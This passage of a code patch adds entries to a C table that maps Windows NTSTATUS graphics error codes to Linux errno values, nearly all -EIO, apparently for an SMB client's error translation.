++	{STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER, -EIO,
++	"STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER"},
++	{STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER, -EIO,
++	"STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER"},
++	{STATUS_GRAPHICS_ADAPTER_WAS_RESET, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_WAS_RESET"},
++	{STATUS_GRAPHICS_INVALID_DRIVER_MODEL, -EIO,
++	"STATUS_GRAPHICS_INVALID_DRIVER_MODEL"},
++	{STATUS_GRAPHICS_PRESENT_MODE_CHANGED, -EIO,
++	"STATUS_GRAPHICS_PRESENT_MODE_CHANGED"},
++	{STATUS_GRAPHICS_PRESENT_OCCLUDED, -EIO,
++	"STATUS_GRAPHICS_PRESENT_OCCLUDED"},
++	{STATUS_GRAPHICS_PRESENT_DENIED, -EIO,
++	"STATUS_GRAPHICS_PRESENT_DENIED"},
++	{STATUS_GRAPHICS_CANNOTCOLORCONVERT, -EIO,
++	"STATUS_GRAPHICS_CANNOTCOLORCONVERT"},
++	{STATUS_GRAPHICS_NO_VIDEO_MEMORY, -EIO,
++	"STATUS_GRAPHICS_NO_VIDEO_MEMORY"},
++	{STATUS_GRAPHICS_CANT_LOCK_MEMORY, -EIO,
++	"STATUS_GRAPHICS_CANT_LOCK_MEMORY"},
++	{STATUS_GRAPHICS_ALLOCATION_BUSY, -EBUSY,
++	"STATUS_GRAPHICS_ALLOCATION_BUSY"},
++	{STATUS_GRAPHICS_TOO_MANY_REFERENCES, -EIO,
++	"STATUS_GRAPHICS_TOO_MANY_REFERENCES"},
++	{STATUS_GRAPHICS_TRY_AGAIN_LATER, -EIO,
++	"STATUS_GRAPHICS_TRY_AGAIN_LATER"},
++	{STATUS_GRAPHICS_TRY_AGAIN_NOW, -EIO, "STATUS_GRAPHICS_TRY_AGAIN_NOW"},
++	{STATUS_GRAPHICS_ALLOCATION_INVALID, -EIO,
++	"STATUS_GRAPHICS_ALLOCATION_INVALID"},
++	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE, -EIO,
++	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE"},
++	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED, -EIO,
++	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED"},
++	{STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION, -EIO,
++	"STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION"},
++	{STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE, -EIO,
++	"STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE"},
++	{STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION, -EIO,
++	"STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION"},
++	{STATUS_GRAPHICS_ALLOCATION_CLOSED, -EIO,
++	"STATUS_GRAPHICS_ALLOCATION_CLOSED"},
++	{STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE, -EIO,
++	"STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE"},
++	{STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE, -EIO,
++	"STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE"},
++	{STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE, -EIO,
++	"STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE"},
++	{STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST, -EIO,
++	"STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST"},
++	{STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE, -EIO,
++	"STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY"},
++	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_VIDPN, -EIO, "STATUS_GRAPHICS_INVALID_VIDPN"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET"},
++	{STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET"},
++	{STATUS_GRAPHICS_INVALID_FREQUENCY, -EIO,
++	"STATUS_GRAPHICS_INVALID_FREQUENCY"},
++	{STATUS_GRAPHICS_INVALID_ACTIVE_REGION, -EIO,
++	"STATUS_GRAPHICS_INVALID_ACTIVE_REGION"},
++	{STATUS_GRAPHICS_INVALID_TOTAL_REGION, -EIO,
++	"STATUS_GRAPHICS_INVALID_TOTAL_REGION"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE"},
++	{STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET, -EIO,
++	"STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET"},
++	{STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET, -EIO,
++	"STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET"},
++	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET"},
++	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET"},
++	{STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_TARGET_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_TARGET_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH"},
++	{STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE"},
++	{STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET, -EIO,
++	"STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET"},
++	{STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_STALE_MODESET, -EIO, "STATUS_GRAPHICS_STALE_MODESET"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE"},
++	{STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN, -EIO,
++	"STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN"},
++	{STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION, -EIO,
++	"STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION"},
++	{STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES, -EIO,
++	"STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES"},
++	{STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE"},
++	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET"},
++	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET"},
++	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR"},
++	{STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET, -EIO,
++	"STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET"},
++	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE"},
++	{STATUS_GRAPHICS_RESOURCES_NOT_RELATED, -EIO,
++	"STATUS_GRAPHICS_RESOURCES_NOT_RELATED"},
++	{STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET, -EIO,
++	"STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET"},
++	{STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER, -EIO,
++	"STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER"},
++	{STATUS_GRAPHICS_NO_VIDPNMGR, -EIO, "STATUS_GRAPHICS_NO_VIDPNMGR"},
++	{STATUS_GRAPHICS_NO_ACTIVE_VIDPN, -EIO,
++	"STATUS_GRAPHICS_NO_ACTIVE_VIDPN"},
++	{STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY"},
++	{STATUS_GRAPHICS_MONITOR_NOT_CONNECTED, -EIO,
++	"STATUS_GRAPHICS_MONITOR_NOT_CONNECTED"},
++	{STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE"},
++	{STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE"},
++	{STATUS_GRAPHICS_INVALID_STRIDE, -EIO,
++	"STATUS_GRAPHICS_INVALID_STRIDE"},
++	{STATUS_GRAPHICS_INVALID_PIXELFORMAT, -EIO,
++	"STATUS_GRAPHICS_INVALID_PIXELFORMAT"},
++	{STATUS_GRAPHICS_INVALID_COLORBASIS, -EIO,
++	"STATUS_GRAPHICS_INVALID_COLORBASIS"},
++	{STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE"},
++	{STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT, -EIO,
++	"STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT"},
++	{STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE, -EIO,
++	"STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE"},
++	{STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN, -EIO,
++	"STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN"},
++	{STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL, -EIO,
++	"STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL"},
++	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION, -EIO,
++	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION"},
++	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED,
++	-EIO,
++	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_GAMMA_RAMP, -EIO,
++	"STATUS_GRAPHICS_INVALID_GAMMA_RAMP"},
++	{STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_MODE_NOT_IN_MODESET, -EIO,
++	"STATUS_GRAPHICS_MODE_NOT_IN_MODESET"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON"},
++	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE"},
++	{STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE"},
++	{STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS, -EIO,
++	"STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS"},
++	{STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING, -EIO,
++	"STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING"},
++	{STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED, -EIO,
++	"STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED"},
++	{STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS, -EIO,
++	"STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS"},
++	{STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT, -EIO,
++	"STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT"},
++	{STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM, -EIO,
++	"STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT"},
++	{STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED, -EIO,
++	"STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED"},
++	{STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION, -EIO,
++	"STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION"},
++	{STATUS_GRAPHICS_INVALID_CLIENT_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_CLIENT_TYPE"},
++	{STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET, -EIO,
++	"STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET"},
++	{STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED, -EIO,
++	"STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED"},
++	{STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER, -EIO,
++	"STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER"},
++	{STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED, -EIO,
++	"STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED"},
++	{STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED, -EIO,
++	"STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED"},
++	{STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY"},
++	{STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED, -EIO,
++	"STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED"},
++	{STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON, -EIO,
++	"STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON"},
++	{STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE, -EIO,
++	"STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE"},
++	{STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER, -EIO,
++	"STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER"},
++	{STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED"},
++	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS,
++	-EIO,
++	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS"},
++	{STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST"},
++	{STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS, -EIO,
++	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS"},
++	{STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST"},
++	{STATUS_GRAPHICS_OPM_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_OPM_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_COPP_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_COPP_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_UAB_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_UAB_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS"},
++	{STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL, -EIO,
++	"STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL"},
++	{STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST, -EIO,
++	"STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST"},
++	{STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
++	"STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
++	{STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
++	"STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
++	{STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_OPM_INVALID_POINTER, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_POINTER"},
++	{STATUS_GRAPHICS_OPM_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_OPM_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_OPM_INVALID_HANDLE, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_HANDLE"},
++	{STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
++	"STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
++	{STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH, -EIO,
++	"STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH"},
++	{STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED, -EIO,
++	"STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED"},
++	{STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED, -EIO,
++	"STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED"},
++	{STATUS_GRAPHICS_PVP_HFS_FAILED, -EIO,
++	"STATUS_GRAPHICS_PVP_HFS_FAILED"},
++	{STATUS_GRAPHICS_OPM_INVALID_SRM, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_SRM"},
++	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP, -EIO,
++	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP"},
++	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP, -EIO,
++	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP"},
++	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA, -EIO,
++	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA"},
++	{STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET, -EIO,
++	"STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET"},
++	{STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH, -EIO,
++	"STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH"},
++	{STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE, -EIO,
++	"STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE"},
++	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS, -EIO,
++	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS"},
++	{STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
++	"STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS"},
++	{STATUS_GRAPHICS_I2C_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_I2C_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST, -EIO,
++	"STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST"},
++	{STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA, -EIO,
++	"STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA"},
++	{STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA, -EIO,
++	"STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA"},
++	{STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_DATA, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_DATA"},
++	{STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE,
++	-EIO,
++	"STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING"},
++	{STATUS_GRAPHICS_MCA_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_MCA_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM"},
++	{STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE"},
++	{STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS, -EIO,
++	"STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS"},
++	{STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED"},
++	{STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
++	"STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
++	{STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
++	"STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
++	{STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_POINTER, -EIO,
++	"STATUS_GRAPHICS_INVALID_POINTER"},
++	{STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
++	"STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
++	{STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL, -EIO,
++	"STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL"},
++	{STATUS_GRAPHICS_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
++	"STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS"},
